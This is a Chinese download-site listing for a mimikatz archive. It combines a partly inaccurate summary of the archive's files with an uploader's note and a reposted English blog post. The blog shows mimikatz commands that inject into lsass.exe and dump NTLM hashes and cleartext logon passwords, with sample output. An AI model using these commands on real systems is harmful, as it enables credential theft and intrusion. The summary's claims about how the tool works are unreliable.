探索mimikatz_trunk 2.2.0在Windows 10 1903上的应用

需积分: 5 3 下载量 85 浏览量 更新于2024-10-11 收藏 900KB ZIP 举报
资源摘要信息:"mimikatz-trunk(2.2.*** Windows 10 1903).zip是一个压缩文件,其中包含了多个与mimikatz_trunk(2相关的内容。这些文件主要用于Windows操作系统,特别是Windows 10版本1903。文件列表包括mimicom.idl,这可能是一个接口定义语言文件,用于定义和实现COM(组件对象模型)接口;README.md,这是一个通常包含项目信息、安装和使用指南、以及其他重要说明的文档文件;kiwi_passwords.yar,这可能是一个用于YARA规则集的文件,YARA是一种用于识别和分类恶意软件的工具;以及x64和Win32,这两个文件夹可能包含了64位和32位架构特定的可执行文件或库文件。" mimikatz是一个在Windows平台广泛使用的安全工具,它能够用来提取密码哈希、明文密码和其他敏感认证数据。它通过模拟Lsass进程来工作,因为Lsass负责管理用户登录过程,包括密码验证。 在此版本中,mimikatz-trunk(2.2.*** Windows 10 1903).zip被标记为适用于Windows 10的1903更新。Windows 10是一个由微软公司开发的操作系统,1903是其更新的代号,也称为2019年五月更新。这个更新对于Windows 10来说是重要的,因为它包含了性能改进、安全更新和新功能。 文件名中的“mimikatz_trunk”可能指的是mimikatz项目的一个分支版本,而“trunk”在这里可能意味着这是主开发线上的最新代码。开发者通常会使用“trunk”来指代主分支,而“branches”和“tags”则用于特定的版本或功能。 在技术上,mimikatz作为一个二进制文件,通常包含在名为“x64”的文件夹中,表明它是为了64位架构的Windows系统设计的。相应地,“Win32”文件夹则可能包含针对32位架构的Windows系统设计的版本,尽管由于Windows现在大多为64位,这个文件夹可能不包含与x64相同的文件。 值得注意的是,由于mimikatz的强大功能,它也被认为是危险的。它可用于合法的安全评估和渗透测试,但同时也可能被用于非法入侵和数据泄露。因此,它的使用受到法律和道德的严格限制,仅限于拥有适当授权的用户。 README.md文件的提及说明了开发者希望为用户提供文档支持,这可能包括如何编译源代码、如何使用mimikatz以及如何遵守安全最佳实践。kiwi_passwords.yar文件表明mimikatz可能能够支持或使用YARA规则进行恶意软件检测,增加了一层安全防护。 从mimikatz-trunk(2.2.*** Windows 10 1903).zip文件的结构来看,开发者可能希望提供一个全面的工具包,既可以用于防御也可以用于攻击,依赖于用户的目的和授权。而对于安全专业人士来说,这种类型的工具箱是一个宝贵的资源,用于学习和提高安全防御能力。在使用这些工具时,应当严格遵守相关的法律和伦理指导原则。
2013-01-24 上传
32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog
2023-11-30 上传